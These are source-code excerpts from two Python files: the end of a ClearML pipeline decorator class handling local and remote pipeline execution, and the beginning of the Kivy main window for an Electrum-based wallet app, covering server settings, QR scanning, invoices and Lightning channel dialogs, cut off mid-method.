:param default_queue: default pipeline step queue
:param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
:param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
steps (Tasks) created by this pipeline.
:param str target_project: If provided, all pipeline steps are cloned into the target project
:param bool abort_on_failure: If False (default), failed pipeline steps will not cause the pipeline
to stop immediately, instead any step that is not connected (or indirectly connected) to the failed step,
will still be executed. Nonetheless the pipeline itself will be marked failed, unless the failed step
was specifically defined with "continue_on_fail=True".
If True, any failed step will cause the pipeline to immediately abort, stop all running steps,
and mark the pipeline as failed.
:param pipeline_execution_queue: remote pipeline execution queue (default 'services' queue).
If None is passed, execute the pipeline logic locally (pipeline steps are still executed remotely)
:param multi_instance_support: If True, allow multiple calls to the same pipeline function,
each call creating a new Pipeline Task. Notice it is recommended to create an additional Task on the
"main process" acting as a master pipeline, automatically collecting the execution plots.
If multi_instance_support=='parallel' then the pipeline calls are executed in parallel,
in the `parallel` case the function calls return None, to collect all pipeline results call
`PipelineDecorator.wait_for_multi_pipelines()`.
Default False, no multi instance pipeline support.
"""
def decorator_wrap(func):
def internal_decorator(*args, **kwargs):
pipeline_kwargs = dict(**(kwargs or {}))
inspect_func = inspect.getfullargspec(func)
if args:
if not inspect_func.args:
raise ValueError("Could not parse function arguments")
pipeline_kwargs.update({inspect_func.args[i]: v for i, v in enumerate(args)})
# add default function arguments if we have defaults for all arguments
if inspect_func.args:
default_values = list(inspect_func.defaults or [])
default_values = ([None] * (len(inspect_func.args) - len(default_values))) + default_values
default_kwargs = {k: v for k, v in zip(inspect_func.args, default_values)}
default_kwargs.update(pipeline_kwargs)
pipeline_kwargs = default_kwargs
# run the entire pipeline locally, as python functions
if cls._debug_execute_step_function:
ret_val = func(**pipeline_kwargs)
LazyEvalWrapper.trigger_all_remote_references()
return ret_val
if default_queue:
cls.set_default_execution_queue(default_queue)
a_pipeline = PipelineDecorator(
name=name,
project=project,
version=version,
pool_frequency=pool_frequency,
add_pipeline_tags=add_pipeline_tags,
target_project=target_project,
abort_on_failure=abort_on_failure,
)
if PipelineDecorator._debug_execute_step_process:
a_pipeline._clearml_job_class = LocalClearmlJob
a_pipeline._default_execution_queue = 'mock'
a_pipeline._clearml_job_class.register_hashing_callback(a_pipeline._adjust_task_hashing)
# add pipeline arguments
if pipeline_kwargs:
a_pipeline.get_parameters().update(pipeline_kwargs)
# serialize / deserialize state only if we are running locally
a_pipeline._start(wait=False)
# sync arguments back
for k in pipeline_kwargs.keys():
if k in a_pipeline.get_parameters():
pipeline_kwargs[k] = a_pipeline.get_parameters()[k]
# run the actual pipeline
if not PipelineDecorator._debug_execute_step_process and pipeline_execution_queue:
# rerun the pipeline on a remote machine
a_pipeline._task.execute_remotely(queue_name=pipeline_execution_queue)
# when we get here it means we are running remotely
# this time the pipeline is executed only on the remote machine
try:
pipeline_result = func(**pipeline_kwargs)
except Exception:
a_pipeline.stop(mark_failed=True)
raise
triggered_exception = None
try:
LazyEvalWrapper.trigger_all_remote_references()
except Exception as ex:
triggered_exception = ex
# make sure we wait for all nodes to finish
waited = True
while waited:
waited = False
for node in list(a_pipeline._nodes.values()):
if node.executed or not node.job or node.job.is_stopped():
continue
node.job.wait(pool_period=15)
waited = True
# store the pipeline result of we have any:
if return_value and pipeline_result is not None:
a_pipeline._task.upload_artifact(
name=str(return_value), artifact_object=pipeline_result, wait_on_upload=True
)
# now we can stop the pipeline
a_pipeline.stop()
# now we can raise the exception
if triggered_exception:
raise triggered_exception
return pipeline_result
if multi_instance_support:
return cls._multi_pipeline_wrapper(
func=internal_decorator, parallel=bool(multi_instance_support == 'parallel'))
return internal_decorator
return decorator_wrap if _func is None else decorator_wrap(_func)
@classmethod
def set_default_execution_queue(cls, default_execution_queue):
# type: (Optional[str]) -> None
"""
Set the default execution queue if pipeline step does not specify an execution queue
:param default_execution_queue: The execution queue to use if no execution queue is provided
"""
cls._default_execution_queue = str(default_execution_queue) if default_execution_queue else None
@classmethod
def run_locally(cls):
# type: () -> ()
"""
Set local mode, run all functions locally as subprocess or serially as functions
Run the full pipeline DAG locally, where steps are executed as sub-processes Tasks
Notice: running the DAG locally assumes the local code execution (i.e. it will not clone & apply git diff)
"""
cls._debug_execute_step_process = True
cls._debug_execute_step_function = False
@classmethod
def debug_pipeline(cls):
# type: () -> ()
"""
Set debugging mode, run all functions locally as functions
Run the full pipeline DAG locally, where steps are executed as functions
Notice:
running the DAG locally assumes the local code execution (i.e. it will not clone & apply git diff)
Pipeline steps are executed as functions (no Task will be created), fo ease debugging J
"""
cls._debug_execute_step_process = True
cls._debug_execute_step_function = True
@classmethod
def _multi_pipeline_wrapper(
cls,
func=None, # type: Callable
parallel=False, # type: bool
):
# type: (...) -> Callable
"""
Add support for multiple pipeline function calls,
enabling execute multiple instances of the same pipeline from a single script.
.. code-block:: python
@PipelineDecorator.pipeline(
multi_instance_support=True, name="custom pipeline logic", project="examples", version="1.0")
def pipeline(parameter=1):
print(f"running with parameter={parameter}")
# run both pipeline (if multi_instance_support=='parallel', run pipelines in parallel)
pipeline(parameter=1)
pipeline(parameter=2)
:param parallel: If True, the pipeline is running in the background, which implies calling
the pipeline twice means running the pipelines in parallel.
Default: False, pipeline function returns when pipeline completes
:return: Return wrapped pipeline function.
Notice the return value of the pipeline wrapped function:
if parallel==True, return will be None, otherwise expect the return of the pipeline wrapped function
"""
def internal_decorator(*args, **kwargs):
# if this is a debug run just call the function (no parallelization).
if cls._debug_execute_step_function:
return func(*args, **kwargs)
def sanitized_env(a_queue, *a_args, **a_kwargs):
os.environ.pop('CLEARML_PROC_MASTER_ID', None)
os.environ.pop('TRAINS_PROC_MASTER_ID', None)
os.environ.pop('CLEARML_TASK_ID', None)
os.environ.pop('TRAINS_TASK_ID', None)
if Task.current_task():
# noinspection PyProtectedMember
Task.current_task()._reset_current_task_obj()
a_result = func(*a_args, **a_kwargs)
if a_queue is not None:
task_id = Task.current_task().id if Task.current_task() else None
a_queue.put((task_id, a_result))
return a_result
queue = Queue()
p = Process(target=sanitized_env, args=(queue, ) + args, kwargs=kwargs)
# make sure we wait for the subprocess.
p.daemon = False
p.start()
if parallel:
cls._multi_pipeline_instances.append((p, queue))
return
else:
p.join()
# noinspection PyBroadException
try:
pipeline_task, result = queue.get_nowait()
except Exception:
return None
# we should update the master Task plot:
if pipeline_task and Task.current_task():
cls._add_pipeline_plots(pipeline_task)
return result
if parallel and not cls._atexit_registered:
cls._atexit_registered = True
atexit.register(cls._wait_for_multi_pipelines)
return internal_decorator
@classmethod
def get_current_pipeline(cls):
# type: () -> "PipelineDecorator"
"""
Return the currently running pipeline instance
"""
return cls._singleton
@classmethod
def wait_for_multi_pipelines(cls):
# type () -> List[Any]
"""
Wait until all background multi pipeline execution is completed.
Returns all the pipeline results in call order (first pipeline call at index 0)
:return: List of return values from executed pipeline, based on call order.
"""
return cls._wait_for_multi_pipelines()
@classmethod
def _wait_for_multi_pipelines(cls):
results = []
if not cls._multi_pipeline_instances:
return results
print('Waiting for background pipelines to finish')
for p, queue in cls._multi_pipeline_instances:
try:
p.join()
except: # noqa
pass
# noinspection PyBroadException
try:
pipeline_task, result = queue.get_nowait()
results.append(result)
cls._add_pipeline_plots(pipeline_task)
except Exception:
pass
cls._multi_pipeline_instances = []
return results
@classmethod
def _add_pipeline_plots(cls, pipeline_task_id):
if not Task.current_task():
return
from clearml.backend_api.services import events
res = Task.current_task().send(
events.GetTaskPlotsRequest(task=pipeline_task_id, iters=1),
raise_on_errors=False,
ignore_errors=True,
)
execution_flow = None
execution_details = None
for p in res.response.plots:
try:
if p['metric'] == cls._report_plot_execution_flow['title'] and \
p['variant'] == cls._report_plot_execution_flow['series']:
execution_flow = json.loads(p['plot_str'])
elif p['metric'] == cls._report_plot_execution_details['title'] and \
p['variant'] == cls._report_plot_execution_details['series']:
execution_details = json.loads(p['plot_str'])
execution_details['layout']['name'] += ' - ' + str(pipeline_task_id)
except Exception as ex:
getLogger('clearml.automation.controller').warning(
'Multi-pipeline plot update failed: {}'.format(ex))
if execution_flow:
Task.current_task().get_logger().report_plotly(
title=cls._report_plot_execution_flow['title'],
series='{} - {}'.format(cls._report_plot_execution_flow['series'], pipeline_task_id),
iteration=0, figure=execution_flow)
if execution_details:
Task.current_task().get_logger().report_plotly(
title=cls._report_plot_execution_details['title'],
series='{} - {}'.format(cls._report_plot_execution_details['series'], pipeline_task_id),
iteration=0, figure=execution_details)
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_onion.storage import WalletStorage, StorageReadWriteError
from electrum_onion.wallet_db import WalletDB
from electrum_onion.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_onion.wallet import check_password_for_directory, update_password_for_directory
from electrum_onion.plugin import run_hook
from electrum_onion import util
from electrum_onion.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_onion.invoices import PR_PAID, PR_FAILED
from electrum_onion import blockchain
from electrum_onion.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_onion.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_onion.logging import Logger
from electrum_onion.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_onion.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_onion.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_onion.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_onion.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_onion_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_onion.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_onion.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_onion.simple_config import SimpleConfig
from electrum_onion.plugin import Plugins
from electrum_onion.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_onion.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_onion.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_onion import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
